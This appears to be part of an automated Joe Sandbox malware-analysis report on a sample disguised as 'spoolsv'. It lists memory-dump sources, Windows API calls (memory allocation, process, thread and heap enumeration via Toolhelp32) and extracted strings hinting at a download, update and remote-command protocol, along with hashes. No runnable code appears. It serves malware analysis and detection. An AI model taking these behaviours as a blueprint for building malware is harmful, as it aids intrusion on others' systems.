                                                • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0056466B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                • Instruction ID: ad2aa484d1772a38b6f3c9364045a751c64e4889beea1b58f91d59234429b9fb
                                                • Opcode Fuzzy Hash: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                • Instruction Fuzzy Hash: D0E0E2B2300248ABDF24CE8CD884BAB379DB759310F108411FA29D7604C675EC50AB61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ,4B
                                                • API String ID: 0-3991844317
                                                • Opcode ID: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                • Instruction ID: 2e62f071ec061e269e0af2fbab426198be3a6a271d82a0366f1eceefab834b83
                                                • Opcode Fuzzy Hash: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                • Instruction Fuzzy Hash: D7D017B23186208FD3406FA9A89462A77F4AB98312F51183EE0C1C2301D63D89449B16
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                • Opcode Fuzzy Hash: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                • Instruction ID: 73ee6168823af3f290b0d29e05c2a6dbec2158b3bd084ab17ee3d9878e5a0866
                                                • Opcode Fuzzy Hash: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                • Instruction Fuzzy Hash: 682103B4604256EFC750DF2CD980A5ABBE0FF98350F508A2AF998CB344D374E944CB56
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                • Instruction ID: d7beefd1e6405fdea3e9c6273c58dc6a0626c210e84cf1c492073799e8a8348a
                                                • Opcode Fuzzy Hash: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                • Instruction Fuzzy Hash: C201F932B04A149FD7108F59EC8485AFBE8FB05720BA641BBE518D3750E735AC50CAD8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                • Instruction ID: 89df57f7bb204646b55b26968683c4ef02bd8f4cea2b8bf6d4b7ab31e3d0ac35
                                                • Opcode Fuzzy Hash: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                • Instruction Fuzzy Hash: 07E048753087045F5305EF65F862D26B7A9D7C9710351C57EF80487A50D939B8118468
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00429480,?,005080A8), ref: 00426D9D
                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E53
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E8E
                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EA1
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EAE
                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EBA
                                                • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EEE
                                                • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EFA
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                • API String ID: 3245196872-1565342463
                                                • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,005080A8), ref: 00426D9D
                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E53
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E8E
                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EA1
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EAE
                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EBA
                                                • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EEE
                                                • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EFA
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: GetLongPathNameA$kernel32.dll
                                                • API String ID: 3245196872-3214324292
                                                • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                • String ID:
                                                • API String ID: 2659516521-0
                                                • Opcode ID: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                • Opcode Fuzzy Hash: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                • String ID:
                                                • API String ID: 2659516521-0
                                                • Opcode ID: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                • Opcode Fuzzy Hash: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                • API String ID: 667068680-597814768
                                                • Opcode ID: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                • Instruction ID: f9718cf08afcb7f2c123aec0f4f78f107bf5674d8a7886d8cd123c748e30e113
                                                • Opcode Fuzzy Hash: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                • Instruction Fuzzy Hash: 1C31EB74601620ABDB40EFA5E886F2E32A9AB56305BD0057FB400DF365C67DD80CAB5E
                                                APIs
                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 00430E9D
                                                  • Part of subcall function 00430E68: GetProcAddress.KERNEL32(00000000), ref: 00430E81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                • API String ID: 1646373207-1918263038
                                                • Opcode ID: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                • Instruction ID: 5ce11bf3dff7dcbac6806bf9111ba2700e275f1f76bf181bd05fd63e8e9933b9
                                                • Opcode Fuzzy Hash: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                • Instruction Fuzzy Hash: 6C41426268434C5B2744676E75224677BDCD25CB00FA0F72FF004CBBA5CB3DA8459A2D
                                                APIs
                                                • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                • API String ID: 1416857345-3736581797
                                                • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                APIs
                                                • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                • API String ID: 1416857345-3736581797
                                                • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                • API String ID: 0-954089795
                                                • Opcode ID: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                • Opcode Fuzzy Hash: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 4232894706-2493093252
                                                • Opcode ID: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                • Opcode Fuzzy Hash: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                APIs
